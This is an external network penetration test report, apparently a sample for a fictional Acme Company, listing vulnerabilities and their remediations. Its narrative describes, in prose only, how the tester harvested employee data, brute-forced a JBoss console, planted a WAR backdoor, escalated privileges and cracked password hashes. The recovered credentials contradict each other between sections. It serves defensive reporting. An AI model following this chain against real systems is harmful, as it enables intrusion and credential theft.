External Network Penetration Test Report

(1)

External Network Penetration

Test Report

Jared Doe

(2)

Document Information

Assessment Information

Assessor Kirit Gupta [email protected] (888) 944-8679 Client Acme Company www.acmecompany.com 123-456-7890 Project Manager Benjamin Caudill [email protected] (888) 944-8679 Client Contact Jared Doe [email protected] Assessment

Type External Network Penetration Test

Project Number ACM-NPT-10162015 Report Date 10-16-2015 Assessment Period 10-14-2015 - 10-14-2015

Revision History

Version Date Author Notes

(3)

1. Executive Summary

Rhino Security Labs conducted a network penetration test for Acme Company (Acme Company). This test was performed to assess Acme Company's defensive posture and provide security assistance through proactively identifying vulnerabilities, validating their severity, and providing remediation steps.

Rhino Security Labs reviewed the security of Acme Company's infrastructure and has determined a CRITICAL risk of compromise from external attackers, as shown by the presence of multiple serious vulnerabilities.

The detailed findings and remediation recommendations for these assessments may be found later in the report.

Strategic Recommendations

Not all security weaknesses are technical in nature, nor can they all be remediated by security

personnel. Companies often have to focus on the root security issues and resolve them at their core. These strategic steps are changes to the operational policy of the organization. Rhino Security Labs recommends the following strategic steps for improving the company's security.

1 Enforce a more secure password policy, and educate users on proper password management.

2 Upgrade all Windows 2003 Servers to 2008 or above.

3 Transition company architecture from cleartext protocols to encrypted versions.

4 Enhance security defenses with additional detection and response capabilities, such as a SIEM

2. Summary Vulnerability Overview

(4)

testing and validation follows to simulate real-world attack scenarios. The following vulnerabilities were determined to be of highest risk, based on several factors including asset criticality, threat likelihood, and vulnerability severity.

Summary

An external network penetration test was performed on Acme Company. The following vulnerabilities were found, indicating the overall risk rating of this application is Critical.

ID Vulnerability Risk Remediation

C1 Subdomain takeover

Vulnerability Critical

Remove the subdomain identifying the server's direct IP address.

C2 JBoss Credentials

Brute Forced Critical

Increase the administrative password complexity, or remove the administrative account if possible.

H1 Sensitive Public

Information Identified High

Remove sensitive information on the company from public resources.

H2 Nameserver Processes

Recursive Queries High Restrict the processing of restrictive queries. H3 Multiple Unpatched

Apache Vulnerabilities High

Update all Apache services and associated modules.

H4 Multiple Unpatched

PHP Vulnerabilities High

Update all PHP services and associated modules.

H5

Multiple Unpatched OpenSSH

Vulnerabilities

High Regularly patch and update all OpenSSH

(5)

M1 NTP Clock Variables Information Disclosure

Medium Remove NTP from the given systems or apply an ACL that restricts NTP readvar queries from unauthorized clients. M2 Adobe Flash permissive crossdomain.xml policy Medium

Edit the crossdomain.xml file, ensuring permissions are restricted to only what’s necessary. L1 TCP Sequence Number Approximation Vulnerability Low

On Windows systems, install the necessary patches for the given version of Windows. On Linux Systems, enable TCP MD5 signatures.

L2 Web Directory is

Publicly Browsable Low

In the httpd.conf file, disable the Indexes option for the appropriate <Directory> tag by removing it from the Options line.

3. Process and Methodology

Rhino Security Labs used a proprietary methodology to accurately assess the security of Acme Company’s networks. This process involves detailed reconnaissance and research into the architecture and environment, performing automated testing for known vulnerabilities, and

manually exploiting vulnerabilities for the purpose of detecting security weaknesses in the enterprise.

Reconnaissance

(6)

services they are running. Research into these services is then carried out to tailor the test to the discovered systems.

Automated Testing

Rhino Security Labs used a vulnerability scanner to conduct an automated analysis on Acme Company’s network. This scan provides foundation for the full manual assessment, and should be viewed with this detailed report to gain an accurate representation of Acme Company’s security posture.

Manual Exploitation and Verification

Rhino Security’s consultants use the results of the vulnerability scan, paired with their expert knowledge and experience, to finally conduct a manual security analysis of the network. The assessors attempt to obtain access to sensitive systems via the published exploits or weaknesses discovered. The detailed results of both the vulnerability scan and the manual testing are shown in the tables below.

4. Constraints

The following limitations were placed upon this engagement, as agreed upon with Acme Company:  Vulnerabilities which would cause outages or interrupt the client's environment were noted

but not validated.

 Penetration testing was limited to the agreed upon time period, scope, and other additional boundaries set in the contract and service agreement.

5. Research

Penetration Testing Notes

(7)

Assessment Information

Description

Assessment Type External Black-box

Vulnerability Scanner Rapid7 NeXpose / Proprietary Internal Tools

VPN Utilized None

Number of IP’s in scope 9

(8)

6. Vulnerability Findings

The vulnerabilities below were identified and verified by Rhino Security Labs during the process of this network penetration test for Acme Company. Retesting should be planned following the remediation of these vulnerabilities.

Attack Narrative

Rhino Security Labs was tasked with performing an external penetration test for Acme Company Industries, an online retailer specializing in the sale of eye care products.

This assessment is part of a larger engagement, involving a web application penetration test, social engineering, and an internal penetration test.

The consultant assigned to this test began by performing routine reconnaissance and information gathering on the company, mining any useful data which can be used later in the assessment. After a thorough sweep of company websites, document metadata, social media sites and other resources, a cache of sensitive information was identified, including:

 Internal LDAP-Username Syntax – Multiple names and internal LDAP usernames were found in PDF metadata from the corporate website. This is useful because it provides the syntax to create LDAP usernames from known employee names – often easy to find.  Corporate Email Syntax – Like many organizations, the company names and Email

Addresses were found online in multiple locations.

 Employee Names - Over 120 Acme employees were found in Linkedin and through other public sources, many of which being high value personnel within the company (IT, Company Executives, etc). Combined with the above syntax, usernames and email address were able to be created for each user – useful for brute forcing and similar network attacks.

(9)

Using this, we were able to confirm a critical security person was on vacation and response times would be slower – useful information to have.

DNS enumeration and bruteforcing was also performed on the domain, identifying a total of 46 subdomains. While many of these domains pointed to servers not in scope and should have additional security auditing performed on them (such as “dev” “transfer” and “shop-dev”), one subdomain (community.acme.com) provided an interesting target. This subdomain pointed to a hosted community site which was no longer being used by acme and could therefore be purchased at the target site – essentially hijacking a legitimate company subdomain.

With initial information gathering activities completed, port and service scanning on Acme Company’s external systems began. The tester encountered telnet and other unencrypted protocols that could be potential threats to the company’s online security. During the tester’s examination of the ports, port 8080 was identified as being open on one system and confirmed as an old JBoss version (4.0.4) , hosting Java applets for Acme Company’s online store.

After further enumeration of the system, the tester

confirmed that the JMX Console (the administrative console to JBoss) required a password.

(10)

Using this highly-targeted brute force, a valid username and password were confirmed –

MAnthony || acmedev1. Rhino Security consultants gained access to the administrative console and began exploitation.

From here, the tester engaged the system, uploading a malicious WAR file (Java Applet) and created a backdoor to the system, allowing initial access to the system – although with limited privileges.

Using this foothold, the tester quickly identified the operating system as Windows 2003, uploaded a local exploit, and escalated to system level privileges.

With these privileges, the tester was able to dump the local system hashes. After inserting these hashes into Rhino Security Labs’ password cracking box, 95% were cracked within just a few hours, and provided access to additional publically-accessible services.

(11)

External Network Details

Exploited Vulnerabilities

The vulnerabilities listed in the tables below were exploited by Rhino Security Labs during the course of the assessment. Evidence of the exploit is provided, along with recommended remediation steps to correct these vulnerabilities.

Subdomain Takeover Vulnerability

Report ID C1 Risk Critical

IP(s)

Exploitation Likelihood High Potential Impact Critical

Description

During the subdomain enumeration process, a CNAME record was found pointing to a hosted community site (ning.com) no longer being used. Since the DNS record is still in place, it can be purchased/registered on the community hosting site and seized by an unauthorized user.

Remediation Remove the affected CNAME record which is no longer being used. Testing

Process

This issue was identified by first enumerating subdomains, which were then tied to specific DNS records and IP addresses. The given CNAME record was identified as pointing to a forum site which is no longer being utilized by the company.

JBoss Credentials Brute Forced

Report ID C2 Risk Critical

IP(s)

(12)

Description The administrative credentials for a publicly facing JBoss server are easily brute-forced (admin::admin). See the above narrative for more details.

Remediation Increase the administrative password complexity, remove the administrative account if possible, and remove public access to JMX Console if possible.

Testing

Process See above narrative – manually tested.

Sensitive Public Information Identified

Report ID H1 Risk High

IP(s) N/A

Exploitation Likelihood High Potential Impact Critical

Description A number of major sources of sensitive information were publically identified, eventually being leveraged in a targeted brute-force against public resources.

Remediation Remove sensitive information on the company from public resources, including social media and the corporate website.

Testing Process

(13)

Notable Vulnerabilities

The following vulnerabilities were not exploited by Rhino Security Labs. However, they still represent a risk to ACME’s network security.

Nameserver Processes Recursive Queries

IP(s)

Exploitation Likelihood High Potential Impact High

Description

Allowing nameservers to process recursive queries coming from any system may, in certain situations, help attackers conduct denial of service or cache poisoning attacks.

Remediation Restrict the processing of recursive queries to only systems that should be allowed to use this nameserver.

Testing Process

NSE (Nmap Scripting Engine) was used to test for Recursive DNS queries with a given list of domains.

Multiple Unpatched Apache Vulnerabilities

App(s)

(14)

Remediation Update all Apache services and associated modules to the newest version available, and ensure appropriate patch management policies are in place.

Testing Process

Using a port scanner, ports 80 and 443 were tested to verify the Apache version and associated vulnerabilities.

Multiple Unpatched PHP Vulnerabilities

App(s)

Description Multiple Unpatched PHP Vulnerabilities were found on the external network. Remediation Update all PHP services and associated modules (such as Apache) to the newest

version available, and ensure appropriate patch management policies are in place. Testing

Process

Using port scanners and version detection tools, the web server was tested for its version of Apache, which was correlated to a corresponding version of PHP.

Multiple Unpatched OpenSSH Vulnerabilities

App(s)

(15)

Remediation Ensure all OpenSSH servers remain up-to-date by regularly patching OpenSSH and associated modules.

Testing Process

A port scanner and version-detection tools were used to verify service versions and vulnerabilities.

Public Telnet Service

App(s)

Description Public telnet services were found on the external network.

Remediation For command-line access, disable telnet and replace with SSH, which utilizes encrypted sessions.

Testing Process

Using a telnet client, port-23 was checked to verify telnet connectivity.

Minor Vulnerabilities

The following vulnerabilities are of lower risk to the environment

NTP Clock Variables Information Disclosure

Report ID M1 Risk Medium

App(s)

Exploitation Likelihood Medium

Potential Impact Critical

Description

(16)

Remediation Remove NTP from the given systems or apply an ACL that restricts NTP readvar queries from unauthorized clients.

Testing Process

NTP 'readvar' queries are sent to the given NTP server, which then respond with identifying information.

Adobe Flash permissive crossdomain.xml policy

Report ID M2 Risk Medium

App(s)

Potential Impact Medium Description

Permissive crossdomain.xml policy files allow external Adobe Flash (SWF) scripts to interact with your website. Depending on how authorization is restricted on your website, this could inadvertently expose data to other domains or allow invocation of functionality across domains.

Remediation Edit the crossdomain.xml file, ensuring permissions are restricted to only what's necessary.

Testing Process

A web browser was used to verify the following HTTP response: '...domain-policy><site-control permitted-cross-domain-policies='all''

TCP Sequence Number Approximation Vulnerability

Report ID L1 Risk Low

App(s)

Exploitation Likelihood Low

(17)

Description Certain conditions make it easier for remote attackers to cause denial-of-service (DoS) against local users by injecting TCP RST packets and ending current sessions.

Remediation

On Windows systems, install the necessary patches for the given version of Windows. On Linux Systems, enable TCP MD5 signatures to prevent this type of TCP injection attack.

Testing Process

Vulnerability was found using a vulnerability scanner. Explicit testing against this vulnerability was not performed due to the results of the attack (Denial of Service).

Web Directory is Publicly Browsable

Report ID L2 Risk Low

App(s)

Potential Impact Low

Description A web directory was found to be browsable, which means that anyone can see the entire contents of the web directory.

Remediation In the httpd.conf file, disable the Indexes option for the appropriate <Directory> tag by removing it from the Options line.

Testing

(18)

Appendix A: Definitions and Criteria

The risk ratings assigned to each vulnerability are determined through averaging several aspects of the exploit and the environment, including reputation, difficulty, and criticality.

Risk Rating Definitions

CRITICAL

Critical vulnerabilities pose very high threat to a company's data, and should be fixed on a top-priority basis. They can allow a hacker to completely compromise the environment or cause other serious impacts to the security of the application

HIGH

High severity vulnerabilities should be considered a top priority in terms of mitigation. These are the most severe issues and generally cause an immediate security concern to the enterprise

MEDIUM

Medium severity vulnerabilities are a lower priority, but should still be remediated in a timely manner. These are moderate exploits that have less of an impact on the environment.

LOW

Low severity vulnerabilities are real but trivially impactful to the environment. These should only be remediated after the HIGH and MEDIUM vulnerabilities are resolved.

INFORMATIONAL

Informational vulnerabilities have no impact as such to the environment by themselves. However, they might provide an attacker with